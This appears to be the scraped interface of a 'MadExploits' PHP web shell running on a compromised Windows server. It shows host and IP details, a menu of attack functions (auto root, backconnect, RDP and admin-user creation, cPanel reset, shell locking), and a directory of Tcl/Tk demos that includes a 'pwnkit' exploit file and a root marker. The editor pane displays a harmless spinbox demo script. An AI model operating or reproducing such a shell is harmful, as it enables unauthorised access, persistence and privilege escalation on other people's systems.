Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
python /
python-3.10 /
tcl /
tk8.6 /
demos /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
README
2.08
KB
-rw-rw-rw-
anilabel.tcl
6.67
KB
-rw-rw-rw-
aniwave.tcl
3.51
KB
-rw-rw-rw-
arrow.tcl
8.16
KB
-rw-rw-rw-
bind.tcl
3.08
KB
-rw-rw-rw-
bitmap.tcl
1.43
KB
-rw-rw-rw-
browse
1.78
KB
-rw-rw-rw-
button.tcl
1.51
KB
-rw-rw-rw-
check.tcl
2.29
KB
-rw-rw-rw-
clrpick.tcl
1.45
KB
-rw-rw-rw-
colors.tcl
4.98
KB
-rw-rw-rw-
combo.tcl
1.98
KB
-rw-rw-rw-
cscroll.tcl
5.09
KB
-rw-rw-rw-
ctext.tcl
6.23
KB
-rw-rw-rw-
dialog1.tcl
999
B
-rw-rw-rw-
dialog2.tcl
846
B
-rw-rw-rw-
en.msg
3.87
KB
-rw-rw-rw-
entry1.tcl
1.4
KB
-rw-rw-rw-
entry2.tcl
2.09
KB
-rw-rw-rw-
entry3.tcl
6.14
KB
-rw-rw-rw-
filebox.tcl
2.38
KB
-rw-rw-rw-
floor.tcl
79.27
KB
-rw-rw-rw-
fontchoose.tcl
1.74
KB
-rw-rw-rw-
form.tcl
1.06
KB
-rw-rw-rw-
goldberg.tcl
57.06
KB
-rw-rw-rw-
hello
531
B
-rw-rw-rw-
hscale.tcl
1.51
KB
-rw-rw-rw-
icon.tcl
2.06
KB
-rw-rw-rw-
image1.tcl
1.01
KB
-rw-rw-rw-
image2.tcl
3.39
KB
-rw-rw-rw-
items.tcl
10.54
KB
-rw-rw-rw-
ixset
8.2
KB
-rw-rw-rw-
knightstour.tcl
9.17
KB
-rw-rw-rw-
label.tcl
1.39
KB
-rw-rw-rw-
labelframe.tcl
1.88
KB
-rw-rw-rw-
license.terms
2.25
KB
-rw-rw-rw-
mclist.tcl
4.37
KB
-rw-rw-rw-
menu.tcl
7.48
KB
-rw-rw-rw-
menubu.tcl
4.46
KB
-rw-rw-rw-
msgbox.tcl
2.01
KB
-rw-rw-rw-
nl.msg
6.71
KB
-rw-rw-rw-
paned1.tcl
1.13
KB
-rw-rw-rw-
paned2.tcl
2.26
KB
-rw-rw-rw-
pendulum.tcl
7.64
KB
-rw-rw-rw-
plot.tcl
2.79
KB
-rw-rw-rw-
puzzle.tcl
2.62
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
radio.tcl
2.75
KB
-rw-rw-rw-
rmt
5.4
KB
-rw-rw-rw-
rolodex
8.3
KB
-rw-rw-rw-
ruler.tcl
5.38
KB
-rw-rw-rw-
sayings.tcl
2.26
KB
-rw-rw-rw-
search.tcl
4.44
KB
-rw-rw-rw-
spin.tcl
1.83
KB
-rw-rw-rw-
square
1.35
KB
-rw-rw-rw-
states.tcl
2.05
KB
-rw-rw-rw-
style.tcl
6.93
KB
-rw-rw-rw-
tclIndex
5.24
KB
-rw-rw-rw-
tcolor
11.34
KB
-rw-rw-rw-
text.tcl
4.3
KB
-rw-rw-rw-
textpeer.tcl
2.2
KB
-rw-rw-rw-
timer
1.11
KB
-rw-rw-rw-
toolbar.tcl
3.29
KB
-rw-rw-rw-
tree.tcl
3.19
KB
-rw-rw-rw-
ttkbut.tcl
3.41
KB
-rw-rw-rw-
ttkmenu.tcl
2.39
KB
-rw-rw-rw-
ttknote.tcl
2.32
KB
-rw-rw-rw-
ttkpane.tcl
4.19
KB
-rw-rw-rw-
ttkprogress.tcl
1.54
KB
-rw-rw-rw-
ttkscale.tcl
1.42
KB
-rw-rw-rw-
twind.tcl
11.72
KB
-rw-rw-rw-
unicodeout.tcl
4.74
KB
-rw-rw-rw-
vscale.tcl
1.49
KB
-rw-rw-rw-
widget
24.21
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : spin.tcl
# spin.tcl -- # # This demonstration script creates several spinbox widgets. if {![info exists widgetDemo]} { error "This script should be run from the \"widget\" demo." } package require Tk set w .spin catch {destroy $w} toplevel $w wm title $w "Spinbox Demonstration" wm iconname $w "spin" positionWindow $w label $w.msg -font $font -wraplength 5i -justify left -text "Three different\ spin-boxes are displayed below. You can add characters by pointing,\ clicking and typing. The normal Motif editing characters are\ supported, along with many Emacs bindings. For example, Backspace\ and Control-h delete the character to the left of the insertion\ cursor and Delete and Control-d delete the chararacter to the right\ of the insertion cursor. For values that are too large to fit in the\ window all at once, you can scan through the value by dragging with\ mouse button2 pressed. Note that the first spin-box will only permit\ you to type in integers, and the third selects from a list of\ Australian cities." pack $w.msg -side top ## See Code / Dismiss buttons set btns [addSeeDismiss $w.buttons $w] pack $btns -side bottom -fill x set australianCities { Canberra Sydney Melbourne Perth Adelaide Brisbane Hobart Darwin "Alice Springs" } spinbox $w.s1 -from 1 -to 10 -width 10 -validate key \ -vcmd {string is integer %P} spinbox $w.s2 -from 0 -to 3 -increment .5 -format %05.2f -width 10 spinbox $w.s3 -values $australianCities -width 10 #entry $w.e1 #entry $w.e2 #entry $w.e3 pack $w.s1 $w.s2 $w.s3 -side top -pady 5 -padx 10 ;#-fill x #$w.e1 insert 0 "Initial value" #$w.e2 insert end "This entry contains a long value, much too long " #$w.e2 insert end "to fit in the window at one time, so long in fact " #$w.e2 insert end "that you'll have to scan or scroll to see the end."
Close